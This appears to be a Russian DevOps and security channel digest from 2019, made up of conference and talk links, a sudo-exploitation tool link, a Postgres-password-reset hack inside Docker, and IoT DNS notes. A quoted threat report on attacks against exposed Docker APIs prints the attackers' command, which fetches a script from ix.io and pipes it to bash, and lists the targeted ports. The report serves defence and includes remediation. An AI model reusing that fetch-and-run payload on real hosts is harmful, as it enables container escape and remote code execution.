3 истории сбоев Kubernetes в production: anti-affinity, graceful shutdown, webhook

https://habr.com/ru/company/flant/blog/475026/

Cloud Security Auditing. Springer. 2019.

- Котики, а где вы храните свои бесценные бэкапчики? Что сейчас модно использовать?
- В докере. Сейчас все модно пихать в докер

Тут Shodan, в честь своего десятилетия, аккаунты за $1 вместо $49 продаёт.

10 years ago @achillean launched the Shodan website! To celebrate a decade of discovery and growth we're going to offer the membership for $1 (marked down from $49) for the next 24 hours (0:00 UTC to 24:00 UTC): https://www.shodan.io/store/member
(с)
https://twitter.com/shodanhq/status/1198033142130581505

A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo

Some of the checks/functionalities that are performed by the tool.
 - Misconfigurations
 - Dangerous Binaries
 - Vulnerable versions of sudo - CVEs (NEW - CVE-2019-14287)
 - Dangerous Environment Variables
 - Credential Harvesting
 - Writable directories where scripts reside
 - Binaries that might be replaced
 - Identify missing scripts

https://github.com/TH3xACE/SUDO_KILLER
+
Примеры использования
https://www.youtube.com/playlist?list=PLQPKPAuCA40FMpMKWZLxQydLe7rPL5bml

Continuous Monitoring – автоматизация проверок качества ПО в CI/CD Pipeline
https://habr.com/ru/company/lanit/blog/451630/

Выложены доклады с LVEE-2019 (Linux Vacation Eastern Europe)
https://www.youtube.com/playlist?list=PLNcc67qYVXQ2BwUYuwZ5aQnQP0U03jaN6
Зеркало на Vimeo
https://vimeo.com/showcase/6383859

Список докладов
http://0x1.tv/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:LVEE-2019

Есть линк на программу
https://lvee.org/ru/reports/program
но там протух серт, а это нехорошо.

Ещё только середина ноября, а у нас уже найден докладчик на очередную встречу Санкт-Петербургской группы пользователей GNU/Linux! На этот раз поговорим об облаках на Linux.

Тема доклада: Готовим начинку для облака (cloudinit/cloudbase иное...)

Облаков нынче много, от больших, до просто запускалок на лаптопе, а вы в курсе как сделать что бы образ был не банальным, а с плюшками и бантиками? Не Опенстеком единым как говорится…

Докладчик: Андрей Фесенко


Сбор 27 ноября 2019 в 19:00 (доклад начнётся в 20:00)

Место: 10я линия В.О. д. 33/35, ф-т Географии СПбГУ, ЦДО Феникс (большая белая дверь на первом этаже напротив входа).

как сбросить пароль на postgresql в запущенном docker контейнере без перезапуска

Рубрика "костылим с буквой"

ОСТОРОЖНО прочитанное далее может вызвать кровотечение из глаз и непреодолимое желание расшибить себе лоб рукой.

вы были предупреждены.

Раскатывал я тут хелм сентри... Дано: не работающий Job, который использует пароль из секрета, и криво написанный авторами чарт, в котором слетает пароль пользователя в postgres. Задача - установить в контенере на лету нужный пароль пользователя.



# получаем пароль который должен быть выставлен на постгре
kubectl -n sentry get secret sentry-sentry-postgresql -o yaml | awk '$1=/postgresql-password:/ {print $2}' | base64 -d; echo

# получаем ноду на которой крутится постгре и ssh-шимся на нее
kubectl -n sentry get po -o wide | awk '$1~/.*postgr.*/ {print $7}'

# получаем id контейнера и логинимся туда под рутом
docker ps | grep postgr | grep entry | awk '{print $1}'
docker exec -ti -u0 <container_id> bash

# узнаем пользователя под которым запущен постгре
grep Uid /proc/1/task/1/status

# разрешаем логиниться из-под локалхоста
sed -ibak 's/^\([^#]*\)md5/\1trust/g' /opt/bitnami/postgresql/conf/

# добавляем пользователя в систему и переходим в него
useradd postgres -u 1001
su postgres

# выставляем переменные окружения и релоадим сервис
export PGDATA=/bitnami/postgresql/data
/opt/bitnami/postgresql/bin/pg_ctl reload

# логинимся в postgres и выставляем пароль
psql -U postgres
ALTER USER postgres WITH PASSWORD 'XXX';

возвращаем назад изменения или перестартуем контейнер.

#рукиизжопы #костыли #postgresql #docker #sentry #kubernetes

Каждый год, начиная с 2009, проходит огромное количество конференций под общим названием DevOpsDays

Оценить масштаб действа можно на главном сайте https://devopsdays.org/

Прикоснуться к прекрасному можно будет на DevOpsDays Moscow 2019.

Конференция является некоммерческим мероприятием с едиными международными правилами. На ней нет хантинга участников, рекламы и передачи вашей почты третьей стороне.

Обычно я делаю отдельный акцент на безопасности и там это есть

- Доклад Юрия Шабалина из Swordfish Security "DevSecOps: tips and tricks"

- Lightning Talk от Андрея Бешкова из Softline "Возлюби безопасника своего как самого себя. Построение DevSecOps как гармоничный путь развития"

- В OpenSpace будет обсуждение, что же делать с этим сосурити

Организаторы написали отдельный большой пост про "кто, что и зачем"
https://habr.com/ru/company/scienceman_events/blog/475658/

Проходить конференция будет в Москве, 7 декабря в "Технополисе" (Волгоградский пр-т., 42, к. 5)

Стоимость билета на одного 7000 (по промокоду genon скидка 5%), а если брать на двоих, то по 6000.

Билеты и программа на https://devopsdays.ru/

В сентябре проходил Nextcloud Conference 2019. Там ещё не выложили всех видосов, но не которые есть. Один из доклалов про документацию и мне он понравился

Mythbusting Documentation - Markus Feilner

This talk is meant to bust the myths around documentation. No, the developer is not the most wanted person to write documentation, and also your software can't do without, and it never will - because customers want ist. Proper documentation is a quality of enterprise grade software, it's one of the pillars of open-source success.

https://www.youtube.com/watch?v=Cpug8Iqw3f8

И что б два раза не вставать.
Если вам интересно всякое связанное с документацией, инструментами для этого и т.д. и т.п., то отличный @Nick_Volynkin ведёт канал @docops, там можно почерпнуть знаний и практик.

Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.

These scans create a container using an Alpine Linux image, and execute the payload via:
"Command": "chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'",

Recons scans largely use ZMap and check the path "/v1.16/version" prior to exploitation.

Ports scanned:
2375/tcp
2376/tcp
2377/tcp
4243/tcp

Remediation recommendation:
Close Docker API ports exposed to the internet.
Terminate unrecognized running containers.

Large uptick in Docker targeted scanning activity started around midnight UTC on 2019-11-24.

Payload script http://ix.io/1XQa has zero detections on VirusTotal (https://www.virustotal.com/gui/file/d898aa7be535f3e12c4d1790abb017bf9d8003a5d9fdceb8918e3a2d8b247838/detection …) despite clear malicious activity.


Тред тут
https://twitter.com/bad_packets/status/1199087675833085959

За ссылку спасибо @ldviolet

​​Решил я тут значит эксперимент с умным домом провести, чтобы жопу от кровати не отрывать когда не хочется, а заодно и в IoT Security погрузиться, хотя бы одним глазком.

Начал с наведения порядка в домашней сети и установки Pi-Hole в качестве основного DNS с использованием DoH. Долго выбирал между DoT и DoH, но остановился все таки на последнем.

Короче, пару недель наблюдения и результаты ужасающие. Умные лампочки и розетки не отказывают себе в удовольствии держать контакт с поднебесной, хотя бы 1 раз в день, Яндекс.Станция постоянно сливает какую-то метрику, а телефоны с установленными приложениями вообще отдельная история, там такой букет...

Немного быстрых цифр:
- Яндекс.Станция за месяц выполнила более 220 000 запросов к DNS.
- Если запретить Яндекс.Станции обращаться на ее сервис метрики в течении дня, она перестает работать.
- Instagram только на одном телефоне за час успевает сделать 134 запроса.
- 1 телефон за 3 часа выполняет около 750+ запросов, из которых 280 к известным рекламным доменам.

Короче то еще дерьмо #internet_of_shit

Доклад @kvaps на HL++ 2019

Облачная платформа OpenNebula / Андрей Квапил (WEDOS Internet, a.s)
https://www.youtube.com/watch?v=47Mht_uoX3A

Markus Winand выложил свою книгу "SQL Performance Explained" для свободного скачивания до понедельника (https://twitter.com/MarkusWinand/status/1199982940471607297)

Соответственно, вот она.

Markus Winand. SQL Performance Explained. Everything developers need to know about SQL performance. 2019.

Отличный доклад Никиты Соболева "Автоматизируем все с Github Actions" с DevOops 2019

https://www.youtube.com/watch?v=QoCSvwkP_lQ

Слайды и ссылки на репы тут https://sobolevn.me/talks/devoops-2019

Дорогие читатели, запись моего доклада для Highload++ 2019 - https://youtu.be/BEZKub1BYCE

Слайд из доклада
Soup to Nuts SRE with Splunk
https://www.youtube.com/watch?v=HCP0Xy-GVjY

Слайды доклада - https://conf.splunk.com/files/2019/slides/IT1046.pdf

Он был рассказан в рамках Splunk.conf19
Плейлист тут
https://www.youtube.com/playlist?list=PLHa9lDJEhqC2jv2Oc0V-94qswd5Z4YfF1